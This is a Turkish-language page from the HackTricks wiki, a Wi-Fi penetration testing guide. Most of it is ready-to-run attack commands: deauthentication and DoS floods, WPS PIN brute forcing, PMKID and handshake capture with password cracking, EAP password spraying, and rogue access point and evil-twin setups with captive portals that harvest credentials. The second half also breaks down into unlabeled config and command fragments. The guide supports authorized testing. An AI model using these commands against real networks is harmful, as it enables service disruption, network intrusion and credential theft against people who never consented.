Pentesting Wifi

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Wifi temel komutlar

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Araçlar

Hijacker & NexMon (Android dahili Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

airgeddon’ı docker ile çalıştırmak

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Kaynak: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Evil Twin, KARMA ve Known Beacons saldırılarını gerçekleştirebilir ve ardından bir phishing şablonu kullanarak ağın gerçek parolasını elde edebilir veya sosyal ağ giriş bilgilerini ele geçirebilir.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Bu araç WPS/WEP/WPA-PSK saldırılarını otomatikleştirir. Otomatik olarak:

• Arayüzü monitor moda geçirir
• Olası ağları tarar - ve hedef(leri) seçmenize izin verir
• WEP ise - WEP saldırılarını başlatır
• WPA-PSK ise
• WPS ise: Pixie dust attack ve bruteforce attack (dikkat: brute-force attack uzun sürebilir). Null PIN veya database/generated PINs’leri denemediğini unutmayın.
• AP’den PMKID yakalamaya çalışır ve kırmak için kullanır
• Handshake yakalamak için AP’nin istemcilerini deauthenticate etmeye çalışır
• PMKID veya Handshake varsa, top5000 parolalarını kullanarak bruteforce etmeye çalışır

Attacks Summary

• DoS
• Deauthentication/disassociation – Herkesi (veya belirli bir ESSID/Client’i) bağlantısını keser
• Random fake APs – Ağları gizleme, tarayıcıları çökertme olasılığı
• Overload AP – AP’yi devre dışı bırakmaya çalışır (genellikle çok faydalı değil)
• WIDS – IDS ile oynama
• TKIP, EAPOL – Bazı AP’lere DoS uygulamak için spesifik bazı saldırılar
• Cracking
• Crack WEP (çeşitli araçlar ve yöntemler)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – captive portal creds yakalamak ve/veya LAN saldırıları gerçekleştirmek için kullanışlı
• WPA-PSK Evil Twin – Parolayı biliyorsanız network saldırıları için kullanışlı
• WPA-MGT – Şirket credentials’larını yakalamak için kullanışlı
• KARMA, MANA, Loud MANA, Known beacon
• + Open – captive portal creds yakalamak ve/veya LAN saldırıları gerçekleştirmek için kullanışlı
• + WPA – WPA handshakes yakalamak için kullanışlı

DOS

Deauthentication Packets

Description from here:.

Deauthentication saldırıları, Wi-Fi hacking’te yaygın bir yöntem olup, “management” çerçevelerini taklit ederek cihazların bir ağdan zorla bağlantısını kesmeyi içerir. Bu şifrelenmemiş paketler, istemcileri bunların meşru ağa ait olduğuna inandırarak aldatır; bu da saldırganların WPA handshakes toplamasına (cracking amacıyla) veya ağ bağlantılarını sürekli olarak bozmasına olanak sağlar. Bu taktik, basitliğiyle ürkütücü olup yaygın şekilde kullanılmakta ve ağ güvenliği açısından önemli sonuçları vardır.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 deauthentication anlamına gelir
• 1, gönderilecek deauths sayısıdır (isterseniz birden fazla gönderebilirsiniz); 0 bunların sürekli gönderilmesini sağlar
• -a 00:14:6C:7E:40:80 access point’in MAC adresidir
• -c 00:0F:B5:34:30:30 deauthenticate edilecek client’in MAC adresidir; bu belirtilmezse broadcast deauthentication gönderilir (her zaman çalışmayabilir)
• ath0 arayüz adıdır

Disassociation Packets

Disassociation packets, deauthentication packets’e benzer şekilde, Wi‑Fi ağlarında kullanılan bir tür management frame’dir. Bu paketler, bir cihaz (ör. laptop veya smartphone) ile access point (AP) arasındaki bağlantıyı sonlandırmak için kullanılır. Disassociation ile deauthentication arasındaki temel fark kullanım senaryolarındadır. AP, deauthentication packets göndererek rogue cihazları ağdan açıkça kaldırırken, disassociation packets genellikle AP kapatma, yeniden başlatma veya taşınma durumlarında gönderilir; böylece tüm bağlı düğümlerin bağlantısının kesilmesi gerekebilir.

This attack can be performed by mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4 tarafından daha fazla DOS saldırısı

Burada here.

ATTACK MODE b: Beacon Flooding

İstemcilere sahte APs göstermek için beacon frames gönderir. Bu bazen network scanners’ı ve hatta sürücüleri çökertebilir!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Menzil içindeki tüm erişilebilir Access Points (APs) üzerine authentication frames göndermek, özellikle çok sayıda clients varsa bu APs üzerinde aşırı yük oluşturabilir. Bu yoğun trafik sistem kararsızlığına yol açarak bazı APs’in donmasına veya hatta resetlenmesine neden olabilir.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs), bir SSID’nin düzgün şekilde açığa çıkıp çıkmadığını kontrol eder ve AP’nin menzilini doğrular. Bu teknik, wordlist ile veya wordlist olmadan bruteforcing hidden SSIDs ile birleştirildiğinde, gizli ağları tespit etmeye ve erişmeye yardımcı olur.

ATTACK MODE m: Michael Countermeasures Exploitation

Farklı QoS kuyruklarına rastgele veya yinelenen paketler göndermek, TKIP APs üzerinde Michael Countermeasures’ı tetikleyebilir ve AP’nin bir dakika kapatılmasına yol açabilir. Bu yöntem etkili bir DoS (Denial of Service) saldırı taktiğidir.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Bir AP’yi EAPOL Start frames ile aşırı yüklemek fake sessions oluşturur; AP’yi bunaltarak meşru istemcilerin erişimini engeller. Alternatif olarak, fake EAPOL Logoff messages enjekte etmek istemcileri zorla bağlantıdan düşürür; her iki yöntem de ağ hizmetini etkili şekilde kesintiye uğratır.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: IEEE 802.11s mesh ağları için saldırılar

Mesh ağlarındaki bağlantı yönetimi ve yönlendirme üzerinde çeşitli saldırılar.

ATTACK MODE w: WIDS Karışıklığı

İstemcileri birden fazla WDS nodes veya sahte rogue APs ile çapraz bağlamak, Intrusion Detection and Prevention Systems’ı manipüle ederek karışıklık ve potansiyel sistem suistimaline yol açabilir.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

Çeşitli paket kaynaklarına ve paket manipülasyonu için kapsamlı bir değiştirici setine sahip bir packet fuzzer.

Airggedon

Airgeddon önceki yorumlarda önerilen saldırıların çoğunu sunar:

WPS

WPS (Wi-Fi Protected Setup), cihazları bir yönlendiriciye bağlama sürecini basitleştirir; özellikle WPA veya WPA2 Personal ile şifrelenmiş ağlarda kurulum hızını ve kolaylığını artırır. Kolayca ele geçirilen WEP güvenliği için etkisizdir. WPS, iki yarıda doğrulanan 8 haneli bir PIN kullanır; sınırlı kombinasyon sayısı nedeniyle (11.000 olasılık) brute-force attacks’a açıktır.

WPS Bruteforce

Bu işlemi gerçekleştirmek için 2 ana araç vardır: Reaver ve Bully.

• Reaver, WPS’ye karşı güçlü ve pratik bir saldırı olacak şekilde tasarlanmıştır ve çeşitli erişim noktaları ve WPS uygulamaları üzerinde test edilmiştir.
• Bully, C ile yazılmış WPS brute force saldırısının yeni bir uygulamasıdır. Orijinal reaver koduna göre birkaç avantajı vardır: daha az bağımlılık, geliştirilmiş bellek ve CPU performansı, endianness’in doğru işlenmesi ve daha sağlam bir seçenek seti.

Saldırı, WPS PIN’in zafiyetinden yararlanır; özellikle ilk dört hanenin açığa çıkması ve son hanenin checksum olarak işlev görmesi brute-force attack’ı kolaylaştırır. Ancak brute-force attacks’a karşı savunmalar, agresif saldırganların blocking MAC addresses gibi önlemleri, saldırıyı sürdürmek için MAC address rotation gerektirir.

Bully veya Reaver gibi araçlarla WPS PIN’i elde ettikten sonra saldırgan WPA/WPA2 PSK’yı türetebilir ve böylece kalıcı ağ erişimi sağlar.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Bu geliştirilmiş yaklaşım, bilinen güvenlik açıklarını kullanarak WPS PIN’lerini hedef alır:

1. Önceden keşfedilmiş PINler: Belirli üreticilere bağlı, standart WPS PIN’leri kullandığı bilinen PIN’lerden oluşan bir veritabanı kullanın. Bu veritabanı, MAC-addresses’in ilk üç oktetini bu üreticiler için muhtemel PIN’lerle ilişkilendirir.
2. PIN Generation Algorithms: ComputePIN ve EasyBox gibi, AP’nin MAC-address’ine dayanarak WPS PIN’lerini hesaplayan algoritmaları kullanın. Arcadyan algorithm ayrıca bir device ID gerektirir; bu, PIN oluşturma sürecine ek bir katman ekler.

WPS Pixie Dust attack

Dominique Bongard, bazı Access Points (APs) içinde gizli kodların oluşturulmasında bir kusur keşfetti; bu kodlar nonces (E-S1 ve E-S2) olarak bilinir. Bu nonces çözülebilirse, AP’nin WPS PIN’ini kırmak kolaylaşır. AP, gerçek olduğunu ve sahte (rogue) bir AP olmadığını kanıtlamak için PIN’i özel bir kodda (hash) açığa çıkarır. Bu nonces, temelde WPS PIN’inin saklandığı “kasayı” açan “anahtarlar“dır. Bununla ilgili daha fazla bilgiyi burada bulabilirsiniz.

Basitçe söylemek gerekirse, sorun şu ki bazı AP’ler bağlantı sürecinde PIN’i şifrelemek için yeterince rastgele anahtarlar kullanmıyordu. Bu da PIN’in ağ dışından tahmin edilmeye karşı (offline brute force attack) savunmasız olmasına neden oluyor.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Eğer cihazı monitor mode’a geçirmek istemiyorsanız veya reaver ve bully ile ilgili bir sorun varsa, OneShot-C’i deneyebilirsiniz. Bu araç monitor mode’a geçmeden Pixie Dust attack gerçekleştirebilir.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Bazı kötü tasarlanmış sistemler, erişim için bir Null PIN (boş veya mevcut olmayan bir PIN) kullanılmasına bile izin verir; bu oldukça alışılmadık bir durumdur. Araç Reaver, Bully’den farklı olarak bu zafiyeti test edebilir.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Önerilen tüm WPS saldırıları airgeddon. kullanılarak kolayca gerçekleştirilebilir.

• 5 ve 6, your custom PIN’i deneme imkanı verir (varsa)
• 7 ve 8, Pixie Dust attack’ı gerçekleştirir
• 13, NULL PIN’i test etmenize izin verir
• 11 ve 12, seçili AP ile ilişkili PIN’leri mevcut veritabanlarından recollect eder ve ComputePIN, EasyBox ve isteğe bağlı olarak Arcadyan kullanarak (önerilir, why not?) olası PINleri generate eder
• 9 ve 10, every possible PIN’i test eder

WEP

Günümüzde büyük ölçüde kırılmış ve nadiren kullanılıyor. Bilmeniz yeter ki airgeddon bu tür korumaya saldırmak için “All-in-One” adlı bir WEP seçeneğine sahiptir. Diğer araçlar da benzer seçenekler sunar.

WPA/WPA2 PSK

PMKID

In 2018, hashcat revealed a new attack method, unique because it only needs one single packet and doesn’t require any clients to be connected to the target AP—just interaction between the attacker and the AP.

Many modern routers add an optional field to the first EAPOL frame during association, known as Robust Security Network. This includes the PMKID.

As the original post explains, the PMKID is created using known data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

“PMK Name” sabit olduğundan, AP’nin ve station’ın BSSID’sini biliyoruz ve PMK tam bir 4-way handshake ile aynı olduğundan, hashcat bu bilgiyi PSK’yı kırmak ve passphrase’i geri almak için kullanabilir!

Bu bilgileri gather etmek ve şifreyi yerel olarak bruteforce etmek için şunları yapabilirsiniz:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Bu Yakalanan PMKIDs console’da gösterilecek ve ayrıca _ /tmp/attack.pcap_ içinde kaydedilecek
Şimdi, yakalamayı hashcat/john formatına dönüştürün ve kırın:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Lütfen doğru bir hash formatının 4 parça içerdiğini unutmayın, örneğin: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Eğer sizinkinin sadece 3 parça içeriyorsa, bu geçersizdir (PMKID capture geçerli değildi).

hcxdumptool’un handshakes da yakalayabildiğini unutmayın (şöyle bir şey görünecektir: MP:M1M2 RC:63258 EAPOLTIME:17091). cap2hccapx kullanarak handshakes’i hashcat/john formatına dönüştürebilirsiniz.

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Bu araçla yakalanan bazı handshakes’in doğru password bilinmesine rağmen cracked olamadığını fark ettim. Mümkünse handshakes’leri geleneksel yöntemlerle de yakalamanızı veya bu araçla birkaç tane daha yakalamanızı öneririm.

Handshake capture

WPA/WPA2 ağlarına yönelik bir saldırı, bir handshake yakalayarak ve şifreyi offline olarak crack etmeye çalışarak gerçekleştirilebilir. Bu süreç, belirli bir ağın ve belirli bir BSSID’nin belirli bir channel üzerindeki iletişimini izlemeyi içerir. İşte sadeleştirilmiş bir rehber:

1. Hedef ağın BSSID, channel ve bir connected client’ini tespit edin.
2. Belirtilen channel ve BSSID üzerinde ağ trafiğini izlemek ve bir handshake yakalamayı ummak için airodump-ng kullanın. Komut şu şekilde görünecektir:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Handshake yakalama şansını artırmak için, istemciyi ağdan kısa süreliğine bağlantısını keserek yeniden kimlik doğrulamaya zorlayın. Bu, istemciye deauthentication paketleri gönderen aireplay-ng komutuyla yapılabilir:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

İstemci deauthenticate edildiğinde farklı bir AP’ye veya, diğer durumlarda, farklı bir ağa bağlanmayı deneyebileceğini unutmayın.

airodump-ng içinde bazı handshake bilgileri göründüğünde, bu handshake’in yakalandığı ve dinlemeyi durdurabileceğiniz anlamına gelir:

Handshake yakalandıktan sonra crack etmek için aircrack-ng kullanabilirsiniz:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Dosyada handshake olup olmadığını kontrol et

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Eğer bu araç bir ESSID için tamamlanmamış bir handshake’i, tamamlanmış olandan önce bulursa, geçerli olanı tespit edemez.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

In enterprise WiFi kurulumlarında çeşitli kimlik doğrulama yöntemleriyle karşılaşırsınız, her biri farklı güvenlik düzeyleri ve yönetim özellikleri sunar. airodump-ng gibi araçları ağ trafiğini incelemek için kullandığınızda, bu kimlik doğrulama türlerine ait tanımlayıcılar görebilirsiniz. Yaygın olarak kullanılan bazı yöntemler şunlardır:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Bu yöntem EAP-PEAP içinde donanım token’larını ve tek kullanımlık parolaları destekler. MSCHAPv2’nin aksine peer challenge kullanmaz ve parolaları access point’e açık metin olarak gönderir; bu durum downgrade saldırıları için risk oluşturur.

2. EAP-MD5 (Message Digest 5):

• İstemciden parolanın MD5 özetinin gönderilmesini içerir. Sözlük saldırılarına karşı savunmasızlığı, sunucu kimlik doğrulamasının olmaması ve oturuma özgü WEP anahtarları üretememesi nedeniyle önerilmez.

3. EAP-TLS (Transport Layer Security):

• Hem istemci hem sunucu tarafı sertifikalarını kimlik doğrulama için kullanır ve haberleşmeyi güvence altına almak için dinamik, kullanıcı-temelli ve oturum-temelli WEP anahtarları üretebilir.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Şifreli bir tünel aracılığıyla karşılıklı kimlik doğrulama sağlar ve dinamik, kullanıcı başına ve oturum başına WEP anahtarları türetme yöntemi sunar. Yalnızca sunucu tarafı sertifikaları gerektirir; istemciler kimlik bilgileri kullanır.

5. PEAP (Protected Extensible Authentication Protocol):

• EAP ile benzer şekilde korumalı iletişim için bir TLS tüneli oluşturur. Tünelin sağladığı koruma sayesinde EAP üstünde daha zayıf kimlik doğrulama protokollerinin kullanılmasına izin verir.
• PEAP-MSCHAPv2: Genellikle PEAP olarak anılır; korunmasız MSCHAPv2 challenge/response mekanizmasını koruyucu bir TLS tüneli ile birleştirir.
• PEAP-EAP-TLS (or PEAP-TLS): EAP-TLS’ye benzer fakat sertifikalar değiş tokuş edilmeden önce bir TLS tüneli başlatır; ek bir güvenlik katmanı sağlar.

You can find more information about these authentication methods here and here.

Kullanıcı Adı Yakalama

Reading https://tools.ietf.org/html/rfc3748#page-27 görünüyor ki eğer EAP kullanıyorsanız “Identity” messages desteklenmelidir ve kullanıcı adı Response Identity mesajlarında açık olarak gönderilecektir.

En güvenli kimlik doğrulama yöntemlerinden biri olan PEAP-EAP-TLS kullanıldığında bile, EAP protokolünde gönderilen kullanıcı adını yakalamak mümkündür. Bunu yapmak için bir kimlik doğrulama iletişimini yakalayın (kanal içinde airodump-ng başlatın ve aynı arayüzde wireshark çalıştırın) ve paketleri eapol ile filtreleyin.
“Response, Identity” paketinin içinde istemcinin kullanıcı adı görünecektir.

Anonim Kimlikler

Kimlik gizleme EAP-PEAP ve EAP-TTLS tarafından desteklenir. Bir WiFi ağının bağlamında, bir EAP-Identity isteği genellikle association sürecinde access point (AP) tarafından başlatılır. Kullanıcı anonimliğinin korunmasını sağlamak için, kullanıcının cihazındaki EAP istemcisinin yanıtı başlangıç RADIUS sunucusunun isteği işlemesi için gereken temel bilgileri içerir. Bu kavram aşağıdaki senaryolarla gösterilebilir:

• EAP-Identity = anonymous
• Bu senaryoda tüm kullanıcılar kullanıcı tanımlayıcısı olarak anonim “anonymous” kullanır. Başlangıç RADIUS sunucusu PEAP veya TTLS protokolünün sunucu tarafını yöneten bir EAP-PEAP veya EAP-TTLS sunucusu olarak görev yapar. İç (korumalı) kimlik doğrulama yöntemi daha sonra ya yerelde işlenir ya da uzak (home) bir RADIUS sunucusuna devredilir.
• EAP-Identity = anonymous@realm_x
• Bu durumda farklı realm’lerden kullanıcılar kimliklerini gizlerken hangi realm’e ait olduklarını belirtirler. Bu, başlangıç RADIUS sunucusunun EAP-PEAP veya EAP-TTLS isteklerini home realm’lerindeki RADIUS sunucularına proxy etmesine olanak tanır; bu sunucular PEAP veya TTLS sunucusu olarak hareket eder. Başlangıç RADIUS sunucusu yalnızca bir RADIUS yönlendirici düğümü olarak çalışır.
• Alternatif olarak başlangıç RADIUS sunucusu EAP-PEAP veya EAP-TTLS sunucusu olarak hareket edebilir ve korumalı kimlik doğrulama yöntemini ya yerel olarak işleyebilir ya da başka bir sunucuya iletebilir. Bu seçenek farklı realm’ler için ayrı politikaların yapılandırılmasını kolaylaştırır.

EAP-PEAP’de, PEAP sunucusu ile PEAP istemcisi arasında TLS tüneli kurulduktan sonra, PEAP sunucusu bir EAP-Identity isteği başlatır ve bunu TLS tüneli üzerinden iletir. İstemci bu ikinci EAP-Identity isteğine TLS tüneli aracılığıyla kullanıcının gerçek kimliğini içeren bir EAP-Identity yanıtı göndererek cevap verir. Bu yaklaşım, 802.11 trafiğini dinleyen herhangi birinin kullanıcının gerçek kimliğini görmesini etkili şekilde önler.

EAP-TTLS biraz farklı bir prosedür izler. EAP-TTLS ile istemci tipik olarak TLS tüneli tarafından korunmuş PAP veya CHAP kullanarak kimlik doğrulaması yapar. Bu durumda istemci, tünel kurulduktan sonra gönderilen ilk TLS mesajına bir User-Name özniteliği ve ya bir Password ya da CHAP-Password özniteliği ekler.

Hangi protokol seçilirse seçilsin, PEAP/TTLS sunucusu TLS tüneli kurulduktan sonra kullanıcının gerçek kimliğini öğrenir. Gerçek kimlik user@realm veya sadece user olarak temsil edilebilir. Eğer PEAP/TTLS sunucusu aynı zamanda kullanıcıyı doğrulamaktan sorumluysa, artık kullanıcının kimliğine sahiptir ve TLS tüneliyle korunan kimlik doğrulama yöntemini uygular. Alternatif olarak, PEAP/TTLS sunucusu kullanıcının home RADIUS sunucusuna yeni bir RADIUS isteği iletebilir. Bu yeni RADIUS isteği PEAP veya TTLS protokol katmanını içermez. Korumalı kimlik doğrulama yöntemi EAP olduğunda, iç EAP mesajları EAP-PEAP veya EAP-TTLS sarmalayıcısı olmadan home RADIUS sunucusuna iletilir. Giden RADIUS mesajının User-Name özniteliği, gelen RADIUS isteğindeki anonim User-Name’in yerini alarak kullanıcının gerçek kimliğini içerir. Korumalı kimlik doğrulama yöntemi PAP veya CHAP olduğunda (sadece TTLS tarafından desteklenir), TLS yükünden çıkarılan User-Name ve diğer kimlik doğrulama öznitelikleri, giden RADIUS mesajında anonim User-Name ve gelen RADIUS isteğindeki TTLS EAP-Message özniteliklerinin yerine konur.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM tabanlı EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM tabanlı Wi‑Fi kimlik doğrulaması (EAP‑SIM/EAP‑AKA üzerinden 802.1X), dağıtım pseudonyms/protected identities veya inner EAP etrafında bir TLS tüneli uygulamıyorsa, yetkilendirilmemiş kimlik aşamasında kalıcı abone tanımlayıcısı (IMSI)’yi açık metin halinde leak edebilir.

Leak’in gerçekleştiği yer (yüksek seviye):

• 802.11 association SSID’ye tamamlanır (çoğunlukla taşıyıcı offload SSID’leri like FreeWifi_secure, eduroam-like operator realms, vb.).
• Authenticator EAP-Request/Identity gönderir.
• Zayıf/korumalı olmayan istemciler koruma olmadan kalıcı kimlikleri = IMSI’yi 3GPP NAI olarak kodlanmış şekilde EAP-Response/Identity ile cevap olarak gönderir.
• Örnek NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• RF’yi pasif olarak dinleyen herhangi biri bu çerçeveyi okuyabilir. 4-way handshake veya TLS anahtarlaması gerekmez.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Notlar:
- Dağıtım, korumalı kimlik/takma kimlikler olmadan çıplak EAP‑SIM/AKA kullanıyorsa, herhangi bir TLS tünelinden önce çalışır.
- Ortaya çıkan değer, abonenin SIM kartına bağlı kalıcı bir tanımlayıcıdır; bunun toplanması uzun vadeli izlemeye ve sonraki telekom kötüye kullanımlarına olanak sağlar.

Etkiler
- Gizlilik: halka açık yerlerde pasif Wi‑Fi yakalamalarından kalıcı kullanıcı/cihaz takibi.
- Telekom kötüye kullanım başlangıcı: IMSI ile SS7/Diameter erişimi olan bir saldırgan konumu sorgulayabilir veya arama/SMS yakalama ve MFA hırsızlığı girişiminde bulunabilir.

Önlemler / nelere dikkat edilmeli
- İstemcilerin EAP‑SIM/AKA için anonim dış kimlikler (pseudonyms) kullandığını 3GPP yönergelerine (ör. 3GPP TS 33.402) göre doğrulayın.
- IMSI'nin asla açık gönderilmemesi için kimlik aşamasını tünellemeyi tercih edin (ör., iç EAP‑SIM/AKA taşıyan EAP‑TTLS/PEAP).
- Association/auth paket yakalamaları EAP-Response/Identity içinde ham bir IMSI ortaya çıkarmamalıdır.

Related: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

